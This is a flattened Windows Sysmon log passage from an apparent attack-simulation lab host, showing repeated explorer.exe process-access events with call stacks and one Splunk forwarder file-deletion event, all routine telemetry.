22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.174{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.173{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.173{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.173{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.173{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.173{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.173{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.173{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.173{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.172{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.172{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.172{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.172{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.172{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000001696456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.172{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC73C3942D1AE749FDBB7BC6F5F3F61F,SHA256=F2C8E4F1D7E819A7D57026A6E608F841688D0B46EFE2D5F01EC75E542E09AFD6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001696455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:54:54.172{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-7010-603D-3788-00000000AD01}7668C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001696454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 